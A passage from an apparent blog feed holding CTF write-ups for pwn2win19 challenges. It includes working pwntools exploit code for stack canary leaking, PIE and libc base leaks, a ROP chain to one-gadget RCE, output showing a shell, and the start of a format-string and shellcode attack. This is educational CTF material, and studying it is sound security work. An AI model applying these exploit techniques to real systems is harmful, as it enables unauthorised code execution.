class="o">^</span> <span class="o">*</span><span class="p">(</span><span class="n">a1</span> <span class="o">+</span> <span class="mi">3</span><span class="p">))</span> <span class="o">==</span> <span class="mh">0x27</span> <span class="o">&amp;&amp;</span> <span class="p">(</span><span class="o">*</span><span class="p">(</span><span class="n">a1</span> <span class="o">+</span> <span class="mi">3</span><span class="p">)</span> <span class="o">^</span> <span class="o">*</span><span class="p">(</span><span class="n">a1</span> <span class="o">+</span> <span class="mi">4</span><span class="p">))</span> <span class="o">==</span> <span class="mh">0x33</span> <span class="o">&amp;&amp;</span> <span class="p">(</span><span class="o">*</span><span class="p">(</span><span class="n">a1</span> <span class="o">+</span> <span class="mi">4</span><span class="p">)</span> <span class="o">^</span> <span class="o">*</span><span class="p">(</span><span class="n">a1</span> <span class="o">+</span> <span class="mi">5</span><span class="p">))</span> <span class="o">==</span> <span class="mh">0x41</span> <span class="o">&amp;&amp;</span> <span class="p">(</span><span class="o">*</span><span class="p">(</span><span class="n">a1</span> <span class="o">+</span> <span class="mi">5</span><span class="p">)</span> <span class="o">^</span> <span class="o">*</span><span class="p">(</span><span class="n">a1</span> <span class="o">+</span> <span class="mi">6</span><span class="p">))</span> <span class="o">==</span> <span class="mh">0x4F</span> <span class="o">&amp;&amp;</span> <span class="p">(</span><span class="o">*</span><span class="p">(</span><span class="n">a1</span> <span class="o">+</span> <span class="mi">6</span><span class="p">)</span> <span class="o">^</span> <span class="o">*</span><span class="p">(</span><span class="n">a1</span> <span class="o">+</span> <span class="mi">7</span><span class="p">))</span> <span class="o">==</span> <span class="mh">0x3B</span> <span class="o">&amp;&amp;</span> <span class="p">(</span><span class="o">*</span><span class="p">(</span><span class="n">a1</span> <span class="o">+</span> <span class="mi">7</span><span class="p">)</span> <span class="o">^</span> <span class="o">*</span><span class="p">(</span><span class="n">a1</span> <span class="o">+</span> <span class="mi">8</span><span class="p">))</span> <span class="o">==</span> <span class="mh">0x1B</span> <span class="o">&amp;&amp;</span> <span class="p">(</span><span class="o">*</span><span class="p">(</span><span class="n">a1</span> <span class="o">+</span> <span class="mi">8</span><span class="p">)</span> <span class="o">^</span> <span class="o">*</span><span class="p">(</span><span class="n">a1</span> <span class="o">+</span> <span class="mi">9</span><span class="p">))</span> <span class="o">==</span> <span class="mh">0x21</span> <span class="o">&amp;&amp;</span> <span class="p">(</span><span class="o">*</span><span class="p">(</span><span class="n">a1</span> <span class="o">+</span> <span class="mi">9</span><span class="p">)</span> <span class="o">^</span> <span class="o">*</span><span class="p">(</span><span class="n">a1</span> <span class="o">+</span> <span class="mi">10</span><span class="p">))</span> <span class="o">==</span> <span class="mh">0x32</span> <span class="o">&amp;&amp;</span> <span class="p">(</span><span class="o">*</span><span class="p">(</span><span class="n">a1</span> <span class="o">+</span> <span class="mi">10</span><span class="p">)</span> <span class="o">^</span> <span class="o">*</span><span class="p">(</span><span class="n">a1</span> <span class="o">+</span> <span class="mi">11</span><span class="p">))</span> <span class="o">==</span> <span class="mh">0x73</span> <span class="o">&amp;&amp;</span> <span class="p">(</span><span class="o">*</span><span class="p">(</span><span class="n">a1</span> <span class="o">+</span> <span class="mi">11</span><span class="p">)</span> <span class="o">^</span> <span class="o">*</span><span class="p">(</span><span class="n">a1</span> <span class="o">+</span> <span class="mi">12</span><span class="p">))</span> <span class="o">==</span> <span class="mh">0x79</span> <span class="o">&amp;&amp;</span> <span class="p">(</span><span class="o">*</span><span class="p">(</span><span class="n">a1</span> <span class="o">+</span> <span class="mi">12</span><span class="p">)</span> <span class="o">^</span> <span class="o">*</span><span class="p">(</span><span class="n">a1</span> <span class="o">+</span> <span class="mi">13</span><span class="p">))</span> <span class="o">==</span> <span class="mh">0x2B</span> <span class="o">&amp;&amp;</span> <span class="p">(</span><span class="o">*</span><span class="p">(</span><span class="n">a1</span> <span class="o">+</span> <span class="mi">13</span><span class="p">)</span> <span class="o">^</span> <span class="o">*</span><span class="p">(</span><span class="n">a1</span> <span class="o">+</span> <span class="mi">14</span><span class="p">))</span> <span class="o">==</span> <span class="mh">0x3A</span> <span class="o">&amp;&amp;</span> <span class="o">*</span><span class="p">(</span><span class="n">a1</span> <span class="o">+</span> <span class="mi">14</span><span class="p">)</span> <span class="o">==</span> <span class="o">*</span><span class="p">(</span><span class="n">a1</span> <span class="o">+</span> <span class="mi">15</span><span class="p">)</span> <span class="o">&amp;&amp;</span> <span class="p">(</span><span class="o">*</span><span class="p">(</span><span class="n">a1</span> <span class="o">+</span> <span class="mi">15</span><span class="p">)</span> <span class="o">^</span> <span class="o">*</span><span class="p">(</span><span class="n">a1</span> <span class="o">+</span> <span class="mi">16</span><span class="p">))</span> <span class="o">==</span> <span class="mi">2</span> <span class="o">&amp;&amp;</span> <span class="p">(</span><span class="o">*</span><span class="p">(</span><span class="n">a1</span> <span class="o">+</span> <span class="mi">16</span><span class="p">)</span> <span class="o">^</span> <span class="o">*</span><span class="p">(</span><span class="n">a1</span> <span class="o">+</span> <span class="mi">17</span><span class="p">))</span> <span class="o">==</span> <span class="mh">0x38</span> <span class="o">&amp;&amp;</span> <span class="p">(</span><span class="o">*</span><span class="p">(</span><span class="n">a1</span> <span class="o">+</span> <span class="mi">17</span><span class="p">)</span> <span class="o">^</span> <span class="o">*</span><span class="p">(</span><span class="n">a1</span> <span class="o">+</span> <span class="mi">18</span><span class="p">))</span> <span class="o">==</span> <span class="mh">0x1D</span> <span class="o">&amp;&amp;</span> <span class="p">(</span><span class="o">*</span><span class="p">(</span><span class="n">a1</span> <span class="o">+</span> <span class="mi">18</span><span class="p">)</span> <span class="o">^</span> <span class="o">*</span><span class="p">(</span><span class="n">a1</span> <span class="o">+</span> <span class="mi">19</span><span class="p">))</span> <span class="o">==</span> <span class="mi">3</span> <span class="o">&amp;&amp;</span> <span class="p">(</span><span class="o">*</span><span class="p">(</span><span class="n">a1</span> <span class="o">+</span> <span class="mi">19</span><span class="p">)</span> <span class="o">^</span> <span class="o">*</span><span class="p">(</span><span class="n">a1</span> <span class="o">+</span> <span class="mi">20</span><span class="p">))</span> <span class="o">==</span> <span class="mi">4</span> <span class="o">&amp;&amp;</span> <span class="p">(</span><span class="o">*</span><span class="p">(</span><span class="n">a1</span> <span class="o">+</span> <span class="mi">20</span><span class="p">)</span> <span class="o">^</span> <span class="o">*</span><span class="p">(</span><span class="n">a1</span> <span class="o">+</span> <span class="mi">21</span><span class="p">))</span> <span class="o">==</span> <span class="mh">0x49</span> <span class="o">&amp;&amp;</span> <span class="p">(</span><span class="o">*</span><span class="p">(</span><span class="n">a1</span> <span class="o">+</span> <span class="mi">21</span><span class="p">)</span> <span class="o">^</span> <span class="o">*</span><span class="p">(</span><span class="n">a1</span> <span class="o">+</span> <span class="mi">22</span><span class="p">))</span> <span class="o">==</span> <span class="mh">0x61</span> <span class="o">&amp;&amp;</span> <span class="o">*</span><span class="p">(</span><span class="n">a1</span> <span class="o">+</span> <span class="mi">22</span><span class="p">)</span> <span class="o">==</span> <span class="mh">0x58</span> <span class="p">)</span> <span class="p">{</span> <span class="k">return</span> <span class="mi">0LL</span><span class="p">;</span> <span class="p">}</span> <span class="k">return</span> <span class="mi">2LL</span><span class="p">;</span> <span class="p">}</span> </code></pre></div></div> <p>we can reverse it to get the password:</p> <div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">op</span> <span class="o">=</span> <span class="p">[</span><span class="mh">0x3F</span><span class="p">,</span><span class="mh">0xB</span><span class="p">,</span><span class="mh">0x27</span><span class="p">,</span><span class="mh">0x33</span><span class="p">,</span><span class="mh">0x41</span><span class="p">,</span><span class="mh">0x4F</span><span class="p">,</span><span class="mh">0x3B</span><span class="p">,</span><span class="mh">0x1B</span><span class="p">,</span><span class="mh">0x21</span><span class="p">,</span><span class="mh">0x32</span><span class="p">,</span><span class="mh">0x73</span><span class="p">,</span><span class="mh">0x79</span><span class="p">,</span><span class="mh">0x2B</span><span class="p">,</span><span class="mh">0x3A</span><span class="p">,</span><span class="mi">2</span><span class="p">,</span><span class="mh">0x38</span><span class="p">,</span><span class="mh">0x1D</span><span class="p">,</span><span class="mi">3</span><span class="p">,</span><span class="mi">4</span><span class="p">,</span><span class="mh">0x49</span><span class="p">,</span><span class="mh">0x61</span><span class="p">,</span><span class="mh">0x58</span><span class="p">]</span> <span class="n">password</span> <span class="o">=</span> <span class="p">[]</span> <span class="nb">max</span> <span class="o">=</span> <span class="nb">len</span><span class="p">(</span><span class="n">op</span><span class="p">)</span> <span class="o">-</span> <span class="mi">1</span> <span class="n">password</span><span class="p">.</span><span class="n">append</span><span class="p">(</span><span class="n">op</span><span class="p">[</span><span class="nb">max</span><span class="p">])</span> <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="nb">len</span><span class="p">(</span><span class="n">op</span><span class="p">)):</span> <span class="n">password</span><span class="p">.</span><span class="n">append</span><span class="p">(</span><span class="n">password</span><span class="p">[</span><span class="n">i</span><span class="p">]</span> <span class="o">^</span> <span class="n">op</span><span class="p">[</span><span class="nb">max</span><span class="o">-</span><span class="mi">1</span><span class="p">])</span> <span class="nb">max</span> <span class="o">-=</span> <span class="mi">1</span> <span class="n">d</span> <span class="o">=</span> <span class="p">[]</span> <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="nb">len</span><span class="p">(</span><span class="n">password</span><span class="p">)):</span> <span class="n">d</span><span class="p">.</span><span class="n">append</span><span class="p">(</span><span class="nb">chr</span><span class="p">(</span><span class="n">password</span><span class="p">[</span><span class="nb">len</span><span class="p">(</span><span class="n">password</span><span class="p">)</span><span class="o">-</span><span class="mi">1</span> <span class="o">-</span><span class="n">i</span><span class="p">]))</span> <span class="n">real_pwd</span> <span class="o">=</span> <span class="s">""</span><span class="p">.</span><span class="n">join</span><span class="p">(</span><span class="n">d</span><span class="p">)</span> <span class="n">real_pwd</span> <span class="o">=</span> <span class="n">real_pwd</span><span class="p">[</span><span class="mi">1</span><span class="p">::]</span> <span class="n">real_pwd</span> <span class="o">=</span> <span class="n">real_pwd</span><span class="p">[</span><span class="mi">0</span><span class="p">:</span><span class="mi">14</span><span class="p">:]</span> <span class="o">+</span> <span class="s">"P"</span> <span class="o">+</span> <span class="n">real_pwd</span><span class="p">[</span><span class="mi">14</span><span class="p">::]</span> </code></pre></div></div> <h4 id="stage-2-leaking-canary">Stage 2. Leaking canary</h4> <p>Later to do ret2libc, we need to bypass canary checking. So we will leak the canary and use it in our exploit.</p> <div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">pad</span> <span class="o">=</span> <span class="s">"B"</span><span class="o">*</span><span class="mi">8</span><span class="o">*</span><span class="mi">4</span> <span class="n">pload_leak_canary</span> <span class="o">=</span> <span class="n">real_pwd</span><span class="p">.</span><span class="n">ljust</span><span class="p">(</span><span class="mh">0x20</span><span class="p">,</span> <span class="s">"A"</span><span class="p">)</span> <span class="o">+</span> <span class="s">"C"</span><span class="o">*</span><span class="mi">8</span> <span class="o">+</span> <span class="n">pad</span> <span class="o">+</span> <span class="s">'X'</span> <span class="n">sendpwd</span><span class="p">(</span><span class="n">r</span><span class="p">,</span> <span class="n">pload_leak_canary</span><span class="p">)</span> <span class="n">r</span><span class="p">.</span><span class="n">recvuntil</span><span class="p">(</span><span class="n">pad</span><span class="p">)</span> <span class="n">canary</span> <span class="o">=</span> <span class="n">u64</span><span class="p">(</span><span class="n">r</span><span class="p">.</span><span class="n">recv</span><span class="p">(</span><span class="mi">8</span><span class="p">))</span> <span class="o">-</span> <span class="nb">ord</span><span class="p">(</span><span class="s">'X'</span><span class="p">)</span> </code></pre></div></div> <h4 id="stage-3-leaking-program-base">Stage 3. Leaking program base</h4> <p>The binary is protected by several mechanism including PIE that will randomizes base address for program segment in memory. We can overwrite filename variable in stack, make it point to <code class="language-plaintext highlighter-rouge">/proc/self/maps</code> and we leak pie base for program. Then we get address of <code class="language-plaintext highlighter-rouge">puts</code>’ function, <code class="language-plaintext highlighter-rouge">puts</code>’ GOT, <code class="language-plaintext highlighter-rouge">pop rdi, ret</code> gadget, and <code class="language-plaintext highlighter-rouge">main</code>. We still want to trigger RCE after program’s <code class="language-plaintext highlighter-rouge">main</code>’s returned, so make program jump back to <code class="language-plaintext highlighter-rouge">main</code> function.</p> <div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">pload_leak_pie</span> <span class="o">=</span> <span class="n">real_pwd</span><span class="p">.</span><span class="n">ljust</span><span class="p">(</span><span class="mh">0x20</span><span class="p">,</span> <span class="s">"A"</span><span class="p">)</span> <span class="o">+</span> <span class="s">"/proc/self/maps</span><span class="se">\x00</span><span class="s">"</span> <span class="n">sendpwd</span><span class="p">(</span><span class="n">r</span><span class="p">,</span> <span class="n">pload_leak_pie</span><span class="p">)</span> <span class="n">p</span> <span class="o">=</span> <span class="s">"0x"</span> <span class="o">+</span> <span class="n">r</span><span class="p">.</span><span class="n">recvuntil</span><span class="p">(</span><span class="s">"-"</span><span class="p">)[:</span><span class="o">-</span><span class="mi">1</span><span class="p">:]</span> <span class="n">e</span><span class="p">.</span><span class="n">address</span> <span class="o">=</span> <span class="nb">int</span><span class="p">(</span><span class="n">p</span><span class="p">,</span> <span class="mi">16</span><span class="p">)</span> <span class="n">puts</span> <span class="o">=</span> <span class="n">e</span><span class="p">.</span><span class="n">plt</span><span class="p">[</span><span class="s">'puts'</span><span class="p">]</span> <span class="n">got_puts</span> <span class="o">=</span> <span class="n">e</span><span class="p">.</span><span class="n">got</span><span class="p">[</span><span class="s">'puts'</span><span class="p">]</span> <span class="n">pop_rdi_ret</span> <span class="o">=</span> <span class="n">e</span><span class="p">.</span><span class="n">address</span> <span class="o">+</span> <span class="mh">0x10a3</span> <span class="c1">#0x00000000000010a3 : pop rdi ; ret </span><span class="n">main</span> <span class="o">=</span> <span class="n">e</span><span class="p">.</span><span class="n">address</span> <span class="o">+</span> <span class="mh">0xEAD</span> </code></pre></div></div> <h4 id="stage-4-leaking-libc-base">Stage 4. Leaking libc base</h4> <p>One gadget rce lies on libc segment,we need to leak libc’s base address. We still want to trigger RCE after program’s <code class="language-plaintext highlighter-rouge">main</code>’s returned, so make program jump back to <code class="language-plaintext highlighter-rouge">main</code> function.</p> <div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">sc_leak_libc</span> <span class="o">=</span> <span class="n">p64</span><span class="p">(</span><span class="n">pop_rdi_ret</span><span class="p">)</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="n">got_puts</span><span class="p">)</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="n">puts</span><span class="p">)</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="n">main</span><span class="p">)</span> <span class="n">pload_leak_libc</span> <span class="o">=</span> <span class="n">real_pwd</span><span class="p">.</span><span class="n">ljust</span><span class="p">(</span><span class="mh">0x20</span><span class="p">,</span> <span class="s">"A"</span><span class="p">)</span> <span class="o">+</span> <span class="s">"C"</span><span class="o">*</span><span class="mi">8</span> <span class="o">+</span> <span class="n">pad</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="n">canary</span><span class="p">)</span> <span class="o">+</span> <span class="s">"D"</span><span class="o">*</span><span class="mi">8</span> <span class="o">+</span> <span class="n">sc_leak_libc</span> <span class="n">sendpwd</span><span class="p">(</span><span class="n">r</span><span class="p">,</span> <span class="n">pload_leak_libc</span><span class="p">)</span> <span class="n">pload_trigger_main_return</span> <span class="o">=</span> <span class="n">real_pwd</span><span class="p">.</span><span class="n">ljust</span><span class="p">(</span><span class="mh">0x20</span><span class="p">,</span> <span class="s">"A"</span><span class="p">)</span> <span class="o">+</span> <span class="s">"</span><span class="se">\x00</span><span class="s">"</span><span class="o">*</span><span class="mi">8</span> <span class="n">sendpwd</span><span class="p">(</span><span class="n">r</span><span class="p">,</span> <span class="n">pload_trigger_main_return</span><span class="p">)</span> <span class="n">r</span><span class="p">.</span><span class="n">recvuntil</span><span class="p">(</span><span class="s">"error"</span><span class="p">)</span> <span class="n">l</span><span class="p">.</span><span class="n">address</span> <span class="o">=</span> <span class="n">u64</span><span class="p">(</span><span class="n">r</span><span class="p">.</span><span class="n">recvline</span><span class="p">()[:</span><span class="o">-</span><span class="mi">1</span><span class="p">:].</span><span class="n">ljust</span><span class="p">(</span><span class="mi">8</span><span class="p">,</span> <span class="s">"</span><span class="se">\x00</span><span class="s">"</span><span class="p">))</span> <span class="o">-</span> <span class="n">l</span><span class="p">.</span><span class="n">symbols</span><span class="p">[</span><span class="s">"puts"</span><span class="p">]</span> </code></pre></div></div> <h4 id="stage-4-triggering-rce">Stage 4. Triggering RCE</h4> <p>Using all information we have, just a simple poke to get RCE.</p> <div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">sc_call_system</span> <span class="o">=</span> <span class="n">p64</span><span class="p">(</span><span class="n">l</span><span class="p">.</span><span class="n">address</span> <span class="o">+</span> <span class="n">ogt</span><span class="p">[</span><span class="mi">1</span><span class="p">])</span> <span class="n">pload_rce</span> <span class="o">=</span> <span class="n">real_pwd</span><span class="p">.</span><span class="n">ljust</span><span class="p">(</span><span class="mh">0x20</span><span class="p">,</span> <span class="s">"A"</span><span class="p">)</span> <span class="o">+</span> <span class="s">"C"</span><span class="o">*</span><span class="mi">8</span> <span class="o">+</span> <span class="n">pad</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="n">canary</span><span class="p">)</span> <span class="o">+</span> <span class="s">"D"</span><span class="o">*</span><span class="mi">8</span> <span class="o">+</span> <span class="n">sc_call_system</span> <span class="n">sendpwd</span><span class="p">(</span><span class="n">r</span><span class="p">,</span> <span class="n">pload_rce</span><span class="p">)</span> <span class="n">sendpwd</span><span class="p">(</span><span class="n">r</span><span class="p">,</span> <span class="n">pload_trigger_main_return</span><span class="p">)</span> </code></pre></div></div> <h4 id="pwned">Pwned</h4> <div class="language-terminal highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="go">❯ python solve.py [+] Starting local process './full_troll': pid 7926 </span><span class="gp">[*] Stage 1 &gt;</span><span class="w"> </span>Get the password <span class="gp">[+] &gt;</span><span class="w"> </span>password: VibEv7xCXyK8AjPPRjwtp9X <span class="gp">[*] Stage 2 &gt;</span><span class="w"> </span>Leaking canary <span class="gp">[+] &gt;</span><span class="w"> </span>canary: 0x3fbac4c898134f00 <span class="gp">[*] Stage 3 &gt;</span><span class="w"> </span>Leaking program base <span class="gp">[+] &gt;</span><span class="w"> </span>program base: 0x5566f0372000, puts: 0x5566f0372840, puts GOT: 0x5566f0573f88, pop_rdi_ret gadget: 0x5566f03730a3, main: 0x5566f0372ead <span class="gp">[*] Stage 4 &gt;</span><span class="w"> </span>Leaking libc base <span class="gp">[+] &gt;</span><span class="w"> </span>libc base: 0x7fbdf1368000, one gadget rce: 0x7fbdf147238c <span class="gp">[*] Stage 5 &gt;</span><span class="w"> </span>Triggering RCE <span class="go">[+] Pwned! [*] Switching to interactive mode </span><span class="gp">$</span><span class="w"> </span><span class="nb">uname</span> <span class="nt">-a</span> <span class="gp">Linux fokt 5.0.0-31-generic #</span>33~18.04.1-Ubuntu SMP Tue Oct 1 10:20:39 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux </code></pre></div></div> Wed, 20 Nov 2019 00:00:00 +0000 https://fachrioktavian.github.io//blog/ctf/pwn2win19-full_troll/ https://fachrioktavian.github.io//blog/ctf/pwn2win19-full_troll/ ctf linux x64 stack buffer overflow ret2libc binary exploitation ctf <h3 id="sources">Sources</h3> <p><a href="https://github.com/fachrioktavian/ctf-writeup/tree/master/pwn2win19/randomvault">https://github.com/fachrioktavian/ctf-writeup/tree/master/pwn2win19/randomvault</a></p> <h3 id="summary">Summary</h3> <p>This challenge is from pwn2win19 ctf. I didn’t join the ctf. Solve this challenge by scraping for the binary in ctftime and solve it locally.</p> <h4 id="overview">Overview</h4> <p>So the binary is a program which saves datas. The datas then being store on a memory with random address.</p> <div class="language-terminal highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="go">❯ ./random_vault Welcome to the Vault! Username: blabla === VAULT === Hello, blabla Actions: 1. Change username 2. Store secret 3. Reset vault 4. Quit 2 </span><span class="gp">Secret #</span>1: 1 <span class="gp">Secret #</span>2: 2 <span class="gp">Secret #</span>3: 3 <span class="gp">Secret #</span>4: 4 <span class="gp">Secret #</span>5: 5 <span class="gp">Secret #</span>6: 6 <span class="gp">Secret #</span>7: 7 <span class="go">You've stored the following secrets: </span><span class="gp">#</span>1: 1, <span class="c">#2: 2, #3: 3, #4: 4, #5: 5, #6: 6, #7: 7</span> <span class="go">Keep secret? (y/n) y Ok! Your data is SAFE. </span></code></pre></div></div> <h4 id="the-bugs">The bugs</h4> <ol> <li> <p>There is format string vulnerability exists on a function that’s called to write down username.</p> <div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code> <span class="kt">unsigned</span> <span class="n">__int64</span> <span class="kr">__fastcall</span> <span class="nf">sub_1412</span><span class="p">(</span><span class="k">const</span> <span class="kt">char</span> <span class="o">*</span><span class="n">global_buf</span><span class="p">)</span> <span class="p">{</span> <span class="kt">unsigned</span> <span class="n">__int64</span> <span class="n">v1</span><span class="p">;</span> <span class="c1">// ST18_8</span> <span class="n">v1</span> <span class="o">=</span> <span class="n">__readfsqword</span><span class="p">(</span><span class="mh">0x28u</span><span class="p">);</span> <span class="n">printf</span><span class="p">(</span><span class="s">"Hello, "</span><span class="p">);</span> <span class="n">sub_12BD</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span> <span class="mi">2</span><span class="p">,</span> <span class="mi">3</span><span class="p">,</span> <span class="mi">4</span><span class="p">,</span> <span class="mi">5</span><span class="p">,</span> <span class="mi">6</span><span class="p">);</span> <span class="n">printf</span><span class="p">(</span><span class="n">global_buf</span><span class="p">,</span> <span class="mi">2LL</span><span class="p">);</span> <span class="c1">// format string</span> <span class="n">puts</span><span class="p">(</span><span class="n">byte_2056</span><span class="p">);</span> <span class="k">return</span> <span class="n">__readfsqword</span><span class="p">(</span><span class="mh">0x28u</span><span class="p">)</span> <span class="o">^</span> <span class="n">v1</span><span class="p">;</span> <span class="p">}</span> </code></pre></div> </div> </li> </ol> <h4 id="exploitations-scenario">Exploitation’s Scenario</h4> <p>For the first time i thing this is just a straightforward format string challenge. Use the bug to leak some information and then overwrite some pointer to gain shell access, but there are some logic that make it hard to solve:</p> <ul> <li> <p>we can only run the format string attack twice. First at the start while program runs, second is when we use <code class="language-plaintext highlighter-rouge">change username</code> function.</p> <div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code> <span class="k">if</span> <span class="p">(</span> <span class="n">qword_4020</span><span class="p">[</span><span class="n">a2</span><span class="p">]</span> <span class="o">==</span> <span class="mh">0x8161412171513111LL</span> <span class="p">)</span> <span class="c1">// check the value</span> <span class="p">{</span> <span class="n">printf</span><span class="p">(</span><span class="s">"Username: "</span><span class="p">);</span> <span class="n">fgets</span><span class="p">(</span><span class="n">global_buf</span><span class="p">,</span> <span class="mi">81</span><span class="p">,</span> <span class="n">stdin</span><span class="p">);</span> <span class="n">global_buf</span><span class="p">[</span><span class="mi">81</span><span class="p">]</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">qword_4020</span><span class="p">[</span><span class="n">a2</span><span class="p">]</span> <span class="o">=</span> <span class="mi">0LL</span><span class="p">;</span> <span class="c1">// zeroed buf</span> <span class="p">}</span> </code></pre></div> </div> </li> <li> <p>username’s buffer spaces are only 80 bytes so can only do arbitrary write approx 12 bytes using <code class="language-plaintext highlighter-rouge">%hn</code> format. It’s difficult if we want to do multiple read and write at the same time.</p> </li> </ul> <p>The scenario will be:</p> <ol> <li> <p>Leaking a RWX regions as program places a function pointer and seed for <code class="language-plaintext highlighter-rouge">store secret</code>:</p> <div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code> <span class="n">srand</span><span class="p">(</span><span class="n">seed</span><span class="p">);</span> <span class="k">for</span> <span class="p">(</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o">&lt;=</span> <span class="mi">6</span><span class="p">;</span> <span class="o">++</span><span class="n">i</span> <span class="p">)</span> <span class="p">{</span> <span class="n">printf</span><span class="p">(</span><span class="s">"Secret #%d: "</span><span class="p">,</span> <span class="p">(</span><span class="n">i</span> <span class="o">+</span> <span class="mi">1</span><span class="p">));</span> <span class="n">v0</span> <span class="o">=</span> <span class="n">rand</span><span class="p">();</span> <span class="n">secret_array</span><span class="p">[</span><span class="n">i</span><span class="p">]</span> <span class="o">=</span> <span class="p">((</span><span class="n">v0</span> <span class="o">&gt;&gt;</span> <span class="mi">56</span><span class="p">)</span> <span class="o">+</span> <span class="n">v0</span><span class="p">)</span> <span class="o">-</span> <span class="p">((</span><span class="n">v0</span> <span class="o">&gt;&gt;</span> <span class="mi">31</span><span class="p">)</span> <span class="o">&gt;&gt;</span> <span class="mi">24</span><span class="p">);</span> <span class="n">__isoc99_scanf</span><span class="p">(</span><span class="s">"%llu"</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">unk_5010</span> <span class="o">+</span> <span class="mi">8</span> <span class="o">*</span> <span class="n">secret_array</span><span class="p">[</span><span class="n">i</span><span class="p">]);</span> <span class="p">}</span> </code></pre></div> </div> </li> <li> <p>Overwriting seed’s value to specific value so we can control where to store secret. And fortunately secrets are stored in RWX region, so we can execute it if we inject shellcode.</p> </li> <li> <p>Overwriting function pointer at RWX region so it’s pointing to the our shellcode.</p> </li> </ol> <h3 id="exploitation">Exploitation</h3> <h4 id="helper">Helper</h4> <p>For cleaner exploit script, we use helper function.</p> <div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">def</span> <span class="nf">init</span><span class="p">(</span><span class="n">r</span><span class="p">,</span> <span class="n">cnt</span><span class="p">):</span> <span class="n">r</span><span class="p">.</span><span class="n">recv</span><span class="p">()</span> <span class="n">r</span><span class="p">.</span><span class="n">sendline</span><span class="p">(</span><span class="n">cnt</span><span class="p">)</span> <span class="k">def</span> <span class="nf">change_username</span><span class="p">(</span><span class="n">r</span><span class="p">,</span> <span class="n">cnt</span><span class="p">):</span> <span class="n">r</span><span class="p">.</span><span class="n">recv</span><span class="p">()</span> <span class="n">r</span><span class="p">.</span><span class="n">sendline</span><span class="p">(</span><span class="s">"1"</span><span class="p">)</span> <span class="n">r</span><span class="p">.</span><span class="n">recv</span><span class="p">()</span> <span class="n">r</span><span class="p">.</span><span class="n">sendline</span><span class="p">(</span><span class="n">cnt</span><span class="p">)</span> <span class="k">def</span> <span class="nf">store_secret</span><span class="p">(</span><span class="n">r</span><span class="p">,</span> <span class="n">s</span><span class="p">):</span> <span class="n">r</span><span class="p">.</span><span class="n">recv</span><span class="p">()</span> <span class="n">r</span><span class="p">.</span><span class="n">sendline</span><span class="p">(</span><span class="s">"2"</span><span class="p">)</span> <span class="k">for</span> <span class="n">d</span> <span class="ow">in</span> <span class="n">s</span><span class="p">:</span> <span class="n">r</span><span class="p">.</span><span class="n">recv</span><span class="p">()</span> <span class="n">r</span><span class="p">.</span><span class="n">sendline</span><span class="p">(</span><span class="n">d</span><span class="p">)</span> <span class="n">r</span> <span class="o">=</span> <span class="n">process</span><span class="p">(</span><span class="s">"./random_vault"</span><span class="p">,</span> <span class="n">aslr</span><span class="o">=</span><span class="mi">1</span><span class="p">)</span> </code></pre></div></div> <h4 id="stage-1-leaking-rwx-region">Stage 1. Leaking RWX region</h4> <p>Using format string vulnerability to leak the region that has RWX permission.</p> <div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">pload_leak</span> <span class="o">=</span> <span class="s">"%p|"</span><span class="o">*</span><span class="mi">11</span> <span class="n">init</span><span class="p">(</span><span class="n">r</span><span class="p">,</span> <span class="n">pload_leak</span><span class="p">)</span> <span class="n">d</span> <span class="o">=</span> <span class="n">r</span><span class="p">.</span><span class="n">recvuntil</span><span class="p">(</span><span class="s">"Actions:"</span><span class="p">).</span><span class="n">split</span><span class="p">(</span><span class="s">"|"</span><span class="p">)</span> <span class="n">rwx</span> <span class="o">=</span> <span class="nb">int</span><span class="p">(</span><span class="n">d</span><span class="p">[</span><span class="mi">10</span><span class="p">],</span> <span class="mi">16</span><span class="p">)</span> <span class="o">+</span> <span class="mh">0x38b0</span> <span class="n">seed</span> <span class="o">=</span> <span class="n">rwx</span> <span class="o">+</span> <span class="mh">0x8</span> </code></pre></div></div> <h4 id="stage-2-calculating-address-of-secret">Stage 2. Calculating address of secret</h4> <p>After overwriting seed’s value to 1 later in stage 3, we can determine where our secret will be stored in memory using dynamic analysis through debugger. Later we will placed our shellcode in the secret variable and chains them with <code class="language-plaintext highlighter-rouge">jmp</code> instruction so it connects one another (like a linked-list). So to make the shellcode easier, order of shellcode in secret will be places from the lowest to higher memory.</p> <div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">loc</span> <span class="o">=</span> <span class="p">[</span><span class="mh">0x67</span><span class="p">,</span> <span class="mh">0xc6</span><span class="p">,</span> <span class="mh">0x69</span><span class="p">,</span> <span class="mh">0x73</span><span class="p">,</span> <span class="mh">0x51</span><span class="p">,</span> <span class="mh">0xff</span><span class="p">,</span> <span class="mh">0x4a</span><span class="p">]</span> <span class="c1"># shellcode order will be 7, 5, 1, 3, 4, 2, 6 </span><span class="n">sc_start</span> <span class="o">=</span> <span class="n">rwx</span> <span class="o">+</span> <span class="mh">0x10</span> <span class="n">sc_loc</span> <span class="o">=</span> <span 